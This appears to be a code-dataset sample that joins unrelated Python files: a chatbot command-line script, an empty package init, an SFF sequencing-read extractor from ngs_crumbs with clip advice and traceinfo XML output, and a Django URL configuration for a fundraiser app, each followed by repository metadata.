try:
if(sys.argv[1] == "--add-command"):
writeCommand(command=sys.argv[2], response=sys.argv[3])
reload(bot)
elif (sys.argv[1] == "--clear-commands"):
#os.remove("commands.bot")
#os.remove("responses.bot")
os.remove("bot_response.py")
writeCommand("Hello", "Hi")
print "Cleared commands"
elif (sys.argv[1] == "learn"):
learner.learn(db_support=False)
elif (sys.argv[1] == "--get-commands"):
commandsList = open("commands.list","r")
print commandsList.read()
else:
toBot()
except IndexError:
toBot()
|
indie-dev/Clarissa
|
bot.py
|
Python
|
apache-2.0
| 2,985
| 0.022446
|
__author__ = 'thuy'
|
cfe-lab/Umberjack
|
test/simulations/indelible/__init__.py
|
Python
|
bsd-2-clause
| 20
| 0
|
# Copyright 2012 Jose Blanca, Peio Ziarsolo, COMAV-Univ. Politecnica Valencia
# This file is part of ngs_crumbs.
# ngs_crumbs is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
# ngs_crumbs is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
# You should have received a copy of the GNU General Public License
# along with ngs_crumbs. If not, see <http://www.gnu.org/licenses/>.
from __future__ import division
from array import array
from crumbs.utils.optional_modules import SffIterator
# pylint: disable=R0913
def _min_left_clipped_seqs(sff_fhand, trim, min_left_clip):
    'It yields SeqRecords from an SFF file handle, enforcing a minimum left clip.'
for record in SffIterator(sff_fhand, trim=False):
annots = record.annotations
clip_qual = annots['clip_qual_left']
clip_adapt = annots['clip_adapter_left']
clip = max(min_left_clip, clip_qual, clip_adapt)
seq = record.seq
if trim:
record.annotations = {}
record = record[clip:]
else:
annots['clip_qual_left'] = clip
annots['clip_adapter_left'] = clip
seq = seq[:clip].lower() + seq[clip:].upper()
quals = record.letter_annotations['phred_quality']
record.letter_annotations = {}
record.seq = seq
dict.__setitem__(record._per_letter_annotations,
"phred_quality", quals)
yield record
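# Worked example of the clipping rule above (the numbers are illustrative): with
# min_left_clip=4, clip_qual_left=2 and clip_adapter_left=0 the effective clip is
# max(4, 2, 0) = 4, so the first four bases are removed when trim is True, or
# lower-cased and recorded in the clip annotations when trim is False.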
class SffExtractor(object):
'This class extracts the reads from an SFF file'
def __init__(self, sff_fhands, trim=False, min_left_clip=0,
nucls_to_check=50, max_nucl_freq_threshold=0.5):
'It inits the class'
self.fhands = sff_fhands
self.trim = trim
self.min_left_clip = min_left_clip
# checking
self.nucls_to_check = nucls_to_check
self.max_nucl_freq_threshold = max_nucl_freq_threshold
self.nucl_counts = {}
@property
def seqs(self):
'It yields all sequences'
for fhand in self.fhands:
self._prepare_nucl_counts(fhand.name)
if not self.min_left_clip:
seqs = SffIterator(fhand, trim=self.trim)
else:
seqs = _min_left_clipped_seqs(fhand, self.trim,
self.min_left_clip)
for record in seqs:
self._update_nucl_counts(str(record.seq), fhand.name)
yield record
def _prepare_nucl_counts(self, fpath):
'It prepares the structure to store the nucleotide counts'
counts = {'A': array('L', [0] * self.nucls_to_check),
'T': array('L', [0] * self.nucls_to_check),
'C': array('L', [0] * self.nucls_to_check),
'G': array('L', [0] * self.nucls_to_check)}
self.nucl_counts[fpath] = counts
def _update_nucl_counts(self, seq, fpath):
'Given a seq (as a string) it updates the nucleotide counts'
seq = seq[:self.nucls_to_check]
counts = self.nucl_counts
for index, nucl in enumerate(seq):
try:
counts[fpath][nucl][index] += 1
except KeyError:
pass # we do not count the lowercase letters
@property
def clip_advice(self):
'It checks how many positions have a high max nucl freq.'
advices = {}
for fhand in self.fhands:
fpath = fhand.name
counts = self.nucl_counts[fpath]
            threshold = self.max_nucl_freq_threshold
pos_above_threshold = 0
seq_above_threshold = ''
index = 0
for index in range(self.nucls_to_check):
num_nucls = [counts['A'][index], counts['T'][index],
counts['C'][index], counts['G'][index]]
tot_nucls = sum(num_nucls)
if not tot_nucls:
continue
freq_nucls = [i / tot_nucls for i in num_nucls]
                above_threshold = [i >= threshold for i in freq_nucls]
if any(above_threshold):
pos_above_threshold += 1
seq_above_threshold += _get_nucl_with_max_freq('ATCG',
freq_nucls)
else:
break
if pos_above_threshold:
if self.trim:
# number of nucleotides to remove next time, the ones
# that we have detected plus the ones already removed
advice = index + self.min_left_clip, seq_above_threshold
else:
advice = index, seq_above_threshold
else:
advice = None
advices[fpath] = advice
return advices
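# Hedged usage sketch for SffExtractor (the file name is an assumption, not part
# of this module): stream the reads out of an SFF file, then ask whether further
# left clipping looks advisable.
#
#     extractor = SffExtractor([open('reads.sff', 'rb')], trim=True)
#     for record in extractor.seqs:
#         pass  # hand each Biopython SeqRecord to a writer here
#     print extractor.clip_advice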
def _do_seq_xml(seq):
seq = seq.object
annots = seq.annotations
read_len = len(seq)
read_name = seq.id
if 'E3MFGYR02FTGED' == read_name:
print annots, read_len
qual_left = annots.get('clip_qual_left', 0)
qual_right = annots.get('clip_qual_right', 0)
vector_left = annots.get('clip_adapter_left', 0)
vector_right = annots.get('clip_adapter_right', 0)
if vector_right >= read_len:
vector_right = 0
if qual_right >= read_len:
qual_right = 0
qual_left = 0 if qual_left < 0 else qual_left
qual_right = 0 if qual_right < 0 else qual_right
vector_left = 0 if vector_left < 0 else vector_left
vector_right = 0 if vector_right < 0 else vector_right
xml = '\t<trace>\n'
xml += '\t\t<trace_name>{}</trace_name>\n'.format(read_name)
if qual_left:
xml += '\t\t<clip_quality_left>{}</clip_quality_left>\n'.format(int(qual_left) + 1)
if qual_right:
        xml += '\t\t<clip_quality_right>{}</clip_quality_right>\n'.format(qual_right)
if vector_left:
xml += '\t\t<clip_vector_left>{}</clip_vector_left>\n'.format(int(vector_left) + 1)
if vector_right:
        xml += '\t\t<clip_vector_right>{}</clip_vector_right>\n'.format(vector_right)
xml += '\t</trace>\n'
return xml
def write_xml_traceinfo(seqs, fhand):
    'It writes a traceinfo XML for the seqs; as a generator it only writes while consumed.'
    fhand.write('<?xml version="1.0"?>\n<trace_volume>\n')
for seq in seqs:
fhand.write(_do_seq_xml(seq))
yield seq
fhand.write('</trace_volume>\n')
fhand.flush()
def _get_nucl_with_max_freq(nucls, freq_nucls):
'It returns the nucleotide with the maximum frequency'
max_ = None
for index, freq in enumerate(freq_nucls):
if max_ is None or max_ < freq:
max_ = freq
nucl = nucls[index]
return nucl
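# Hedged example for _get_nucl_with_max_freq (the frequencies are illustrative):
#     _get_nucl_with_max_freq('ATCG', [0.1, 0.6, 0.2, 0.1])  # -> 'T'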
|
JoseBlanca/ngs_crumbs
|
crumbs/seq/sff_extract.py
|
Python
|
gpl-3.0
| 7,004
| 0.000571
|
from django.conf.urls import url
from fundraiser_app import views
urlpatterns = [
url(r'^$', views.FMItemListView.as_view(), name='fmitem_list'),
url(r'^about/$', views.AboutView.as_view(), name='about'),
url(r'^fmitem/(?P<pk>\d+)$', views.FMItemDetailView.as_view(), name='fmitem_detail'),
url(r'^fmitem/new$', views.FMItemCreateView.as_view(), name='fmitem_new'),
url(r'^fmitem/(?P<pk>\d+)/edit$', views.FMItemUpdateView.as_view(), name='fmitem_edit'),
url(r'^fmitem/(?P<pk>\d+)/remove$', views.FMItemDeleteView.as_view(), name='fmitem_remove'),
url(r'^fmitem/(?P<pk>\d+)/publish/$', views.fmitem_publish, name='fmitem_publish'),
]
|
CarlGraff/fundraisermemorial
|
fundraiser_app/urls.py
|
Python
|
mit
| 663
| 0.006033
|